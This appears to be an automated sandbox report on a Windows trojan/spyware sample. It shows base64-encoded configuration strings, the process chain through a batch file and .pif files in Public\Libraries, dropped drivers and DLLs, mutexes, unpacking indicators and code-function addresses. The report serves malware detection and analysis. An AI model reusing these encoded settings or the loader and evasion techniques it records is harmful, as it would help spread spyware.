'z99oHKnRLBWI3zRJFX6I1KqmtH8dY+CXESIG6X6yu4otkTMTNiJ36O2zco8xzqa44bAjO2sAwihOVfLWEhPg4Qp2bXsnCimY/V+oHKlxLStvDk4BtHBXtv5BjHTVKcc1LXgjhZkd5dSt3vcTTAy5u2+txX8evjglETehx/NfPVfSxyJOVERPFT7rYHvSjytF3mLW7XLfyzsR0PoM3Mt00jm5Xbh0PrNejQ2FVsoz3waWCKlvvS7PcLuLLKYS8OasCqr7L6geMqpttdgS/7uDbXrRNjLCZs9JwBUQLAPVFibU/EUGwUg2oxIgUHw4aoEwcixR3q/97BfLzhpzJILbkurefknfO4eqVNdcO72pyjh7NpNtrGXY27H02aN368jbAwhEYhUu+L3AGdMRkWOj+WSpW2zy6h8qldjgdz0ffypYpgixU8eA+IkqKxdZ18+plpGbqKNx3EWt8uuQjKIDgu7AmP8PThB6hDBoGhpc3GdHqHqlBU+iIay7gHFtfop3VjXLiBrQSehx8fSDfuOIpFQOa8BrFQTDNU2xqM8LAKdbNVGGQKx+JMJr52CfIMfC4yNoS0sdS5R1InYtzHJiHpP7LBsSI2XzZCQQaAGwdFCmaqsMTp14slVJfstVHo2lrjIGjJNd4HWo8PenwOaZwzw+1Fc1paTlbeaFjmYivdjX61GVytJIxjrh8g19msaqVFn1jTBCnKCplMF8JhOKdHqmRmGyLuKWNCHl95RxjibGSj4JXxRlnTQXjRj5gYGEwYFTVpegOsPnjGXLVVfYERJs0H0SIuQm1N9AjsxtKLDYoS0+r7rTrtQA/rGJJK5KcVAdRyMRiIYvybIAvvPx6gB2OlRNDn6ExxKvPRtv3tX8T3D+c8CQJElvjM64G8XEsgdKA0NDUTfYlO6crYPKMKmyKeEUFhPQ+aZZsumxKss57YWlQeP5mZjkoCyswY+fCHh60X/wHJg4r/yg0ipAcLm84Pqrxz48EOh12gDlkborOO/32jVzdD3Fxb84AX6V+CZSB7uEOKn9YpF/kusZK6jYsZNIA6oKeDv+2on41PuatDR2s8lsPlWx6oL1gQOV8x/WMfSYwDv5WuTjhQv+9egMg+MIYcqXNZXu3vWvd3bO7Ib5w3CTPLt5RvOMwI8RNmETK6FBLj4H3JaKnRxh0lT0RXwAeYVHpxpEzoUHHoVeqBbqVpSYjp96Vd6BKIDwSh/5izCHRDLFEkr2jkLnSkvcwijkwAt0BzkPvbAEEUJiSY5gfxb9AVJgrGEQdsNKJVgns1Xujvj+VVv6I6IEch8qrO0Z8rpGcMpH+Snz91AZG5h7nUfKySwwB0U9G74Q/Jv87rgEa8/ArvlVl3iv9azQakimedJ6dfqeAuF5wNrPGvX+yfMpWy2QEY3Qpm1gqAsaphWw13uJttdrWf6Yet1aO8rN69DdYme1er2ZXios4BTnxlmjRqMgiXAncLxLCN5kyar8bUVXTIWo/EaUNn1z3qDkXYbTHV0PMwcQd21KwefcuiL/LWjkS6DKzswGZHcgVO+sEBDYxJmDJnLszJ0rc9cOZWrCpggdJSzzrlj+LmiKA4lWNfx8VSA6YLvloo63Sam28phT8TNadtGHZ3mBpe2bLJhRZo5q0tVXCA3brkJgXmSiqIU6tt2/UH4UAzJ2LQdEuFkzmuPZ4RKYDJCrZ3QX75rKw+Y8sI8Z3ciLnY1QQw6Pi7L64n3pmOmSt85rovyceFgQanO8PCL9VeMk0JDkWR1k7Znm4AaMqEHZJJEAqWYcRr9gxO0hlt2Z+q4uBwgHFtSi6tTtkywxZJHXQwtmCyOS+wA49ZhQCW1WU++cOHv+21XmefUy0qB055ZLSLKNx3R8h325snhCiLrdlCUdQu6JBwUiSD/pBmyYKB//00+kYfu4ZlrcFgao6pwUK/AW3dMJprN85eHEO1lPpCTQrdiVGgTL9/k8nvZ+yzF2iDfepVWSjRtf1DUn1aVbplyWYsSbCzNv56he2FK54MW/R3LdA8aoz7yOn6LY13fe629sXBiB+zAP8mKYRcva6cuPWngobVRgIi1dAarwE8A+dOpnJ115UGx0jtO1HOa+LjbqB5u/rqKLKaaeaRF2w7HuuzA1HoD7CLzOB3qorzV1Lql9/H4FFy2zY7S9kqe9VuZGjMc2hJTCjauCGSBu+0W5OGQVhZDTq7xbhk0ia3fIiT+gRFkePK7Y9w9RVLCsem36RcbaYnJDUTq0LE5iT7O/oNWJTP9LNLxaMzIX9IGRexxxAR5DdcwxXZsqv+xl2qmXsb9tjvmAEOGtvRmcTJ5DbO3bIPtVtbbQU7ysDotVkDOuSpSHPVlIYHQ=', 'TR9X/Vnsl+hzM+e5nhNmmlBy1ADQPwc/gSTtlPixb3Jhwl75jute4CIDxmk4rJrn2ZfJVfhckqw51eybBdSs0bb1Tc9P8o5ekPCBgMoloce6BtlYQC0Q5sLMeZ8IZRaZkKfVBvrLcM9M2IMSmWdXXvIsIK3L3jNT1nfIUBA7GEO6NixQDlmyfKlfsUdag5aqdbeeqho6PKokSEx4L1nvXD6ylxZMlj58zon/Q09L34OVhe8bGGG+eZEc8OEP7U9bvmw+2TRmzZqjuGCvO+eWsF3
              Source: 4.2.vokleakA.pif.33006458.6.raw.unpack, Settings.csBase64 encoded string: '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
              Source: truesight.sys.0.drBinary string: \Device\Driver\
              Source: truesight.sys.0.drBinary string: \Device\TrueSight
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@13/12@2/2
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_04123458 GetLastError,FormatMessageA,0_2_04123458
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_04108F56 GetDiskFreeSpaceA,0_2_04108F56
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,4_2_004019F0
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_0411EF94 CoCreateInstance,0_2_0411EF94
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_0411A27C FindResourceA,LoadResource,SizeofResource,LockResource,0_2_0411A27C
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeFile created: C:\Users\Public\Libraries\Akaelkov.PIFJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2504:120:WilError_03
              Source: C:\Users\Public\Libraries\vokleakA.pifMutant created: \Sessions\1\BaseNamedObjects\jhT6lZT93vW5
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\AkaelkovO.bat" "
              Source: C:\Users\Public\Libraries\vokleakA.pifCommand line argument: 08A4_2_00413780
              Source: C:\Users\Public\Libraries\vokleakA.pifCommand line argument: 08A4_2_00413780
              Source: C:\Users\Public\Libraries\vokleakA.pifCommand line argument: 08A4_1_00413780
              Source: C:\Users\Public\Libraries\vokleakA.pifCommand line argument: 08A7_2_00413780
              Source: C:\Users\Public\Libraries\vokleakA.pifCommand line argument: 08A7_2_00413780
              Source: C:\Users\Public\Libraries\vokleakA.pifCommand line argument: 08A7_1_00413780
              Source: C:\Users\Public\Libraries\vokleakA.pifCommand line argument: 08A9_2_00413780
              Source: C:\Users\Public\Libraries\vokleakA.pifCommand line argument: 08A9_2_00413780
              Source: C:\Users\Public\Libraries\vokleakA.pifCommand line argument: 08A9_1_00413780
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: PCMNil7wkU.exeReversingLabs: Detection: 26%
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeFile read: C:\Users\user\Desktop\PCMNil7wkU.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\PCMNil7wkU.exe C:\Users\user\Desktop\PCMNil7wkU.exe
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\AkaelkovO.bat" "
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeProcess created: C:\Users\Public\Libraries\vokleakA.pif C:\Users\Public\Libraries\vokleakA.pif
              Source: unknownProcess created: C:\Users\Public\Libraries\Akaelkov.PIF "C:\Users\Public\Libraries\Akaelkov.PIF"
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Users\Public\Libraries\vokleakA.pif C:\Users\Public\Libraries\vokleakA.pif
              Source: unknownProcess created: C:\Users\Public\Libraries\Akaelkov.PIF "C:\Users\Public\Libraries\Akaelkov.PIF"
              Source: C:\Users\Public\Libraries\Akaelkov.PIFProcess created: C:\Users\Public\Libraries\vokleakA.pif C:\Users\Public\Libraries\vokleakA.pif
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\AkaelkovO.bat" "Jump to behavior
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeProcess created: C:\Users\Public\Libraries\vokleakA.pif C:\Users\Public\Libraries\vokleakA.pifJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFProcess created: C:\Users\Public\Libraries\vokleakA.pif C:\Users\Public\Libraries\vokleakA.pifJump to behavior
              Source: C:\Users\Public\Libraries\Akaelkov.PIFProcess created: C:\Users\Public\Libraries\vokleakA.pif C:\Users\Public\Libraries\vokleakA.pifJump to behavior
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: PCMNil7wkU.exeStatic file information: File size 1743360 > 1048576
              Source: PCMNil7wkU.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x128a00
              Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.dr
              Source: Binary string: easinvoker.pdb source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.0.dr
              Source: Binary string: _.pdb source: vokleakA.pif, 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000003.2155090535.00000000243C6000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000002.2218197846.000000002439D000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000009.00000003.2280708634.000000002FF94000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000003.2280042315.000000002FF94000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000002.2318435848.000000002FF94000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000003.2279905778.000000002FF94000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000003.2281099206.000000002FF94000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000003.2279726385.000000002FF94000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000003.2280484770.000000002FF94000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000003.2247149385.000000002FF94000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000003.2280249711.000000002FF94000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdbH source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.0.dr

              Data Obfuscation

              barindex
              Source: C:\Users\Public\Libraries\vokleakA.pifUnpacked PE file: 4.2.vokleakA.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
              Source: C:\Users\Public\Libraries\vokleakA.pifUnpacked PE file: 7.2.vokleakA.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
              Source: C:\Users\Public\Libraries\vokleakA.pifUnpacked PE file: 9.2.vokleakA.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
              Source: C:\Users\Public\Libraries\vokleakA.pifUnpacked PE file: 4.2.vokleakA.pif.400000.0.unpack
              Source: C:\Users\Public\Libraries\vokleakA.pifUnpacked PE file: 7.2.vokleakA.pif.400000.0.unpack
              Source: C:\Users\Public\Libraries\vokleakA.pifUnpacked PE file: 9.2.vokleakA.pif.400000.0.unpack
              Source: Yara matchFile source: 0.2.PCMNil7wkU.exe.4100000.4.unpack, type: UNPACKEDPE
              Source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 4.2.vokleakA.pif.31be4ec6.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 4.2.vokleakA.pif.3305d590.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 4.2.vokleakA.pif.31e40ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 4.2.vokleakA.pif.33006458.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: vokleakA.pif.0.drStatic PE information: 0x7BBD3E91 [Sun Oct 14 18:38:09 2035 UTC]
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_0411FCD8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_0411FCD8
              Source: initial sampleStatic PE information: section where entry point is pointing to: .....
              Source: netutils.dll.0.drStatic PE information: real checksum: 0x21402 should be: 0x2599d
              Source: Akaelkov.PIF.0.drStatic PE information: real checksum: 0x0 should be: 0x1b586f
              Source: PCMNil7wkU.exeStatic PE information: real checksum: 0x0 should be: 0x1b586f
              Source: easinvoker.exe.0.drStatic PE information: section name: .imrsiv
              Source: netutils.dll.0.drStatic PE information: section name: .....
              Source: netutils.dll.0.drStatic PE information: section name: .....
              Source: netutils.dll.0.drStatic PE information: section name: ......
              Source: netutils.dll.0.drStatic PE information: section name: ......
              Source: netutils.dll.0.drStatic PE information: section name: ......
              Source: netutils.dll.0.drStatic PE information: section name: ....
              Source: netutils.dll.0.drStatic PE information: section name: ......
              Source: netutils.dll.0.drStatic PE information: section name: ......
              Source: netutils.dll.0.drStatic PE information: section name: ....
              Source: netutils.dll.0.drStatic PE information: section name: ....
              Source: netutils.dll.0.drStatic PE information: section name: ......
              Source: netutils.dll.0.drStatic PE information: section name: /4
              Source: netutils.dll.0.drStatic PE information: section name: /19
              Source: netutils.dll.0.drStatic PE information: section name: /31
              Source: netutils.dll.0.drStatic PE information: section name: /45
              Source: netutils.dll.0.drStatic PE information: section name: /57
              Source: netutils.dll.0.drStatic PE information: section name: /70
              Source: netutils.dll.0.drStatic PE information: section name: /81
              Source: netutils.dll.0.drStatic PE information: section name: /92
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_041695F8 push 04169685h; ret 0_2_0416967D
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_04114432 push 041144AAh; ret 0_2_041144A2
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_04114434 push 041144AAh; ret 0_2_041144A2
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_0412063B push 0412067Fh; ret 0_2_04120677
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_0412063C push 0412067Fh; ret 0_2_04120677
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_0415C67C push ecx; mov dword ptr [esp], edx0_2_0415C681
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_041066FA push 04106757h; ret 0_2_0410674F
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_041066FC push 04106757h; ret 0_2_0410674F
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_0416872C push 0416895Eh; ret 0_2_04168956
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_04158770 push 041587CAh; ret 0_2_041587C2
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_04116760 push ecx; mov dword ptr [esp], edx0_2_04116765
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_0412008B push 041200CFh; ret 0_2_041200C7
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_0412008C push 041200CFh; ret 0_2_041200C7
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_04158128 push 04158154h; ret 0_2_0415814C
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_0412CC74 push 0412CCB7h; ret 0_2_0412CCAF
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_0412AC64 push 0412ACA2h; ret 0_2_0412AC9A
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_04114DDC push 04114E29h; ret 0_2_04114E21
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_0412CFA4 push 0412CFD0h; ret 0_2_0412CFC8
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_0410E90C push 0410E938h; ret 0_2_0410E930
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_04134980 push 041349EBh; ret 0_2_041349E3
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_041169BC push ecx; mov dword ptr [esp], edx0_2_041169C1
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_04116ADC push ecx; mov dword ptr [esp], edx0_2_04116AE1
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_0411EB12 push 0411EBBFh; ret 0_2_0411EBB7
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_0411EB14 push 0411EBBFh; ret 0_2_0411EBB7
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_04116B20 push ecx; mov dword ptr [esp], edx0_2_04116B25
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_04103464 push eax; ret 0_2_041034A0
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_0412D468 push 0412D494h; ret 0_2_0412D48C
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_0411D4D8 push ecx; mov dword ptr [esp], edx0_2_0411D4DA
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_04107511 push 04107576h; ret 0_2_0410756E
